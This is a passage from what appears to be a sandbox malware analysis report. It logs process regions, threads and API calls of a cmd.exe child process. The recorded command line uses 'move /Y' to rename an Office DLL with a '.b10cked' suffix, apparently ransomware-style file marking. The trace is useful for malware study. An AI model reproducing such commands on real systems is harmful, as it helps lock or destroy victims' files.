(This=0x720828) returned 0x0 [0178.232] CoUninitialize () [0178.401] exit (_Code=0) [0178.401] ??1CHString@@QAE@XZ () returned 0x6f950504 [0178.401] ??1CHString@@QAE@XZ () returned 0x6f950504 Thread: id = 336 os_tid = 0xe18 
Thread: id = 355 os_tid = 0x934 Thread: id = 357 os_tid = 0x4e4 Thread: id = 358 os_tid = 0xffc Thread: id = 359 os_tid = 0x53c Process: id = "272" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22095 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22096 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22097 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22098 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22099 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22100 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = 
"ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22101 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22102 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22103 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22104 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22132 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22133 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22134 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22135 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 22136 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 22137 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22138 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = 
"kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22139 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22140 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22141 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22142 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22143 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22144 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22145 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22146 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 22147 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 
"c:\\windows\\system32\\imm32.dll") Region: id = 22148 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22149 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22150 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22151 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 22152 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 22153 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 22154 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 22155 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 335 os_tid = 0xe14 [0160.379] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f9c4 | out: lpSystemTimeAsFileTime=0x16f9c4*(dwLowDateTime=0x9961b8a0, dwHighDateTime=0x1d440a9)) [0160.379] GetCurrentProcessId () returned 0xedc [0160.379] GetCurrentThreadId () returned 0xe14 [0160.379] GetTickCount () returned 0x30e71 [0160.379] QueryPerformanceCounter (in: lpPerformanceCount=0x16f9bc | out: lpPerformanceCount=0x16f9bc*=21716799183) returned 1 [0160.380] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0160.380] __set_app_type (_Type=0x1) [0160.380] __p__fmode () returned 0x76b331f4 [0160.380] __p__commode () returned 0x76b331fc 
[0160.380] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0160.380] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0160.380] GetCurrentThreadId () returned 0xe14 [0160.380] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe14) returned 0x38 [0160.380] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0160.380] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0160.380] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.381] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0160.381] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f954 | out: phkResult=0x16f954*=0x0) returned 0x2 [0160.381] VirtualQuery (in: lpAddress=0x16f98b, lpBuffer=0x16f924, dwLength=0x1c | out: lpBuffer=0x16f924*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.381] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f924, dwLength=0x1c | out: lpBuffer=0x16f924*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0160.381] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f924, dwLength=0x1c | out: lpBuffer=0x16f924*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0160.381] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f924, dwLength=0x1c | out: lpBuffer=0x16f924*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) 
returned 0x1c [0160.381] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f924, dwLength=0x1c | out: lpBuffer=0x16f924*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0160.381] GetConsoleOutputCP () returned 0x1b5 [0160.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.381] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0160.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.381] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0160.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.382] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0160.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.382] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0160.382] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.382] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0160.382] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.382] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0160.383] GetEnvironmentStringsW () returned 0x320210* [0160.383] FreeEnvironmentStringsW (penv=0x320210) returned 1 [0160.383] GetEnvironmentStringsW () returned 0x320210* [0160.383] FreeEnvironmentStringsW (penv=0x320210) returned 1 [0160.383] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e8c4 | out: phkResult=0x16e8c4*=0x40) returned 0x0 [0160.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0xa0, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.383] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, 
lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x1, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0x1, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x0, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.383] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x40, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x40, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0x40, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.384] RegCloseKey (hKey=0x40) returned 0x0 [0160.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e8c4 | out: phkResult=0x16e8c4*=0x40) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0x40, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, 
lpData=0x16e8d0*=0x1, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0x1, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x0, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x9, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x9, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0x9, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.384] RegCloseKey (hKey=0x40) returned 0x0 [0160.384] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886382 [0160.384] srand (_Seed=0x5b886382) [0160.384] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked\"" [0160.384] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked\"" [0160.385] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.385] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x321970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0160.385] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0160.385] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.385] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.385] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0160.385] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0160.385] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0160.385] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0160.385] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0160.386] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0160.386] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0160.386] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0160.386] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0160.386] GetEnvironmentStringsW () returned 0x322360* [0160.386] FreeEnvironmentStringsW (penv=0x322360) returned 1 [0160.386] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.386] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.386] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0160.386] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0160.386] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0160.386] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0160.386] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0160.386] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0160.386] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0160.386] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0160.387] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f690 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.387] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f690, lpFilePart=0x16f68c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f68c*="Desktop") returned 0x18 [0160.387] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0160.387] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f40c | out: lpFindFileData=0x16f40c) returned 0x3209f0 [0160.387] FindClose (in: hFindFile=0x3209f0 | out: hFindFile=0x3209f0) returned 1 [0160.387] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f40c | out: lpFindFileData=0x16f40c) returned 0x3209f0 [0160.387] FindClose (in: hFindFile=0x3209f0 | out: hFindFile=0x3209f0) returned 1 [0160.387] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f40c | out: lpFindFileData=0x16f40c) returned 0x3209f0 [0160.387] FindClose (in: hFindFile=0x3209f0 | out: hFindFile=0x3209f0) returned 1 [0160.388] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0160.388] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0160.388] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0160.388] GetEnvironmentStringsW () returned 0x320210* 
[0160.388] FreeEnvironmentStringsW (penv=0x320210) returned 1 [0160.388] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.388] GetConsoleOutputCP () returned 0x1b5 [0160.389] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.389] GetUserDefaultLCID () returned 0x409 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f7d0, cchData=128 | out: lpLCData="0") returned 2 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f7d0, cchData=128 | out: lpLCData="0") returned 2 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f7d0, cchData=128 | out: lpLCData="1") returned 2 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0160.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0160.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0160.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0160.390] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0160.391] GetConsoleTitleW (in: lpConsoleTitle=0x310930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.391] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0160.391] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0160.391] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0160.391] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0160.392] _wcsicmp (_String1="move", _String2=")") returned 68 [0160.392] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0160.392] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0160.392] _wcsicmp (_String1="IF", _String2="move") returned -4 [0160.392] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0160.392] _wcsicmp (_String1="REM", _String2="move") returned 5 [0160.392] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0160.396] GetConsoleTitleW (in: lpConsoleTitle=0x16f4c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.398] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0160.398] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0160.398] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0160.398] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0160.398] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0160.398] _wcsicmp (_String1="move", _String2="CD") returned 10 [0160.398] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0160.398] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0160.398] _wcsicmp (_String1="move", _String2="REN") returned -5 [0160.398] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0160.398] 
_wcsicmp (_String1="move", _String2="SET") returned -6 [0160.398] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0160.398] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0160.398] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0160.398] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0160.399] _wcsicmp (_String1="move", _String2="MD") returned 11 [0160.399] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0160.399] _wcsicmp (_String1="move", _String2="RD") returned -5 [0160.399] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0160.399] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0160.399] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0160.399] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0160.399] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0160.399] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0160.399] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0160.399] _wcsicmp (_String1="move", _String2="VER") returned -9 [0160.399] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0160.399] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0160.399] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0160.399] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0160.399] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0160.399] _wcsicmp (_String1="move", _String2="START") returned -6 [0160.399] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0160.399] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0160.399] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0160.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.401] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f284, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f27c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, 
